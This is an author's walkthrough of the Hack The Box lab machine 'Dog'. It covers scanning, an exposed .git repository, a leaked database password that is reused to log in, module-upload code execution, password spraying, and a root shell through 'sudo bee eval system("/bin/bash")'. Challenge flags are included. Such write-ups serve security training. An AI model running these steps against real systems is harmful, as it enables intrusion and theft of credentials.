HTB Dog - 🐧
Enumeration and Footprinting
nmap:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
nmap -sC -sV -A -T4 -Pn 10.10.11.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-17 22:14 IST
Nmap scan report for 10.10.11.58
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-title: Home | Dog
| http-git:
| 10.10.11.58:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
1 216.74 ms 10.10.14.1
2 218.53 ms 10.10.11.58
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.03 seconds
dirsearch:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
dirsearch -u http://10.10.11.58
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/d31ty/Downloads/HTB/reports/http_10.10.11.58/_25-03-17_22-15-12.txt
Target: http://10.10.11.58/
[22:15:12] Starting:
[22:15:27] 301 - 309B - /.git -> http://10.10.11.58/.git/
[22:15:27] 200 - 604B - /.git/
[22:15:27] 200 - 95B - /.git/COMMIT_EDITMSG
[22:15:27] 200 - 92B - /.git/config
[22:15:27] 200 - 73B - /.git/description
[22:15:27] 200 - 23B - /.git/HEAD
[22:15:27] 200 - 409B - /.git/branches/
[22:15:27] 200 - 230B - /.git/logs/refs/heads/master
[22:15:27] 301 - 319B - /.git/logs/refs -> http://10.10.11.58/.git/logs/refs/
[22:15:27] 301 - 325B - /.git/logs/refs/heads -> http://10.10.11.58/.git/logs/refs/heads/
[22:15:28] 200 - 650B - /.git/hooks/
[22:15:27] 200 - 476B - /.git/logs/
[22:15:27] 200 - 240B - /.git/info/exclude
[22:15:28] 200 - 455B - /.git/info/
[22:15:27] 200 - 230B - /.git/logs/HEAD
[22:15:28] 301 - 320B - /.git/refs/heads -> http://10.10.11.58/.git/refs/heads/
[22:15:28] 200 - 41B - /.git/refs/heads/master
[22:15:28] 200 - 461B - /.git/refs/
[22:15:28] 301 - 319B - /.git/refs/tags -> http://10.10.11.58/.git/refs/tags/
[22:15:28] 200 - 2KB - /.git/objects/
[22:15:30] 403 - 276B - /.htaccess.bak1
[22:15:30] 403 - 276B - /.htaccess.sample
[22:15:30] 403 - 276B - /.htaccess.save
[22:15:30] 403 - 276B - /.htaccess_orig
[22:15:31] 403 - 276B - /.html
[22:15:31] 403 - 276B - /.htm
[22:15:31] 403 - 276B - /.htpasswd_test
[22:15:31] 200 - 337KB - /.git/index
[22:15:31] 403 - 276B - /.htaccessBAK
[22:15:31] 403 - 276B - /.htaccess.orig
[22:15:31] 403 - 276B - /.httr-oauth
[22:15:31] 403 - 276B - /.htaccessOLD
[22:15:31] 403 - 276B - /.htaccess_extra
[22:15:31] 403 - 276B - /.htpasswds
[22:15:31] 403 - 276B - /.htaccess_sc
[22:15:31] 403 - 276B - /.htaccessOLD2
[22:15:31] 403 - 276B - /.ht_wsr.txt
[22:15:37] 403 - 276B - /.php
[22:16:55] 301 - 309B - /core -> http://10.10.11.58/core/
[22:17:14] 301 - 310B - /files -> http://10.10.11.58/files/
[22:17:15] 200 - 595B - /files/
[22:17:26] 200 - 4KB - /index.php
[22:17:27] 404 - 2KB - /index.php/login/
[22:17:34] 200 - 456B - /layouts/
[22:17:35] 200 - 7KB - /LICENSE.txt
[22:17:46] 301 - 312B - /modules -> http://10.10.11.58/modules/
[22:17:46] 200 - 399B - /modules/
[22:18:11] 200 - 5KB - /README.md
[22:18:14] 200 - 528B - /robots.txt
[22:18:17] 403 - 276B - /server-status
[22:18:17] 403 - 276B - /server-status/
[22:18:18] 200 - 0B - /settings.php
[22:18:22] 301 - 310B - /sites -> http://10.10.11.58/sites/
[22:18:30] 301 - 311B - /themes -> http://10.10.11.58/themes/
[22:18:30] 200 - 454B - /themes/
.git enumeration
Honestly this enumeration sucks for a easy machine, as there are so many git files and it is a rabbithole to find info.
But this is how it will be in real world :D So it’s skill. Maybe if anyone knows a better way to enumerate, please ping me at my discord id - .d31ty
settings.php
1
2
3
4
5
$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';
$database_prefix = '';
$settings['hash_salt'] = 'aWFvPQNGZSz1DQ701dD4lC5v1hQW34NefHvyZUzlThQ';
/files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(d31ty㉿kali)-[~/…/0-8204779c764abd4c9d8d95038b6d22b6a7515afa/files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active]
└─$ cat update.settings.json
{
"_config_name": "update.settings",
"_config_static": true,
"update_cron": 1,
"update_disabled_extensions": 0,
"update_interval_days": 0,
"update_url": "",
"update_not_implemented_url": "https://github.com/backdrop-ops/backdropcms.org/issues/22",
"update_max_attempts": 2,
"update_timeout": 30,
"update_emails": [
"tiffany@dog.htb"
],
"update_threshold": "all",
"update_requirement_type": 0,
"update_status": [],
"update_projects": []
}
“tiffany@dog.htb”
core/modules/system/system.info
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/…/0-8204779c764abd4c9d8d95038b6d22b6a7515afa/core/modules/system]
└─$ cat system.info
type = module
name = System
description = Handles general site configuration for administrators.
package = System
version = BACKDROP_VERSION
backdrop = 1.x
required = TRUE
configure = admin/config/system
; Added by Backdrop CMS packaging script on 2024-03-07
project = backdrop
version = 1.27.1
timestamp = 1709862662
User found: tiffany
Fortunately the login page was using the same password for tiffany - BackDropJ2024DS2024 
Found this: ‘# Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)’ POC Link Create shell.tar.gz (as other file types like .zip are not supported)and upload in the browser and install. - Do manual installation.
Once installed can access the shell at /modules/shell/shell.php Boom! 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
jobert:x:1000:1000:jobert:/home/jobert:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false
This can be hilarous, but it is that simple to try password spraying for all the users. So new users found: jobert and johncusack Password try: BackDropJ2024DS2024
Logged in as this user: johncusack User flag: dfb0b868b301969bf41b0da38843f079
Privilege Escalation
1
2
3
4
5
6
7
johncusack@dog:~$ sudo -l
Matching Defaults entries for johncusack on dog:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User johncusack may run the following commands on dog:
(ALL : ALL) /usr/local/bin/bee
So /usr/local/bin/bee seems to be CLI for backdrop cms By doing cat and -h commands we can use it to our leverage.
Out of all commands, this eval seems interesting..
1
2
3
4
eval
ev, php-eval
Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.
So tried this command:
1
2
3
johncusack@dog:~$ /usr/local/bin/bee eval 'system("/bin/bash")'
✘ The required bootstrap level for 'eval' is not ready.
But it seems that the bootstrap needs a write access to run the command. So we need to find a path where we can write, ofcourse the base web path is writable by default ‘/var/www/html’
Even to confirm this:
1
2
3
johncusack@dog:/tmp$ sudo /usr/local/bin/bee --root=/tmp eval 'system("/bin/bash")'
✘ The required bootstrap level for 'eval' is not ready.
So this is my understanding.
The root command: johncusack@dog:/tmp$ sudo /usr/local/bin/bee --root=/var/www/html eval 'system("/bin/bash")'
Pwned!
Root flag: b20ecca6e74f0e75a26f1911a16e6ddd
My rank after this machine: #821 25.4% towards Pro Hacker 26.35% of Hack The Box Pwned
This post is licensed under CC BY 4.0 by the author.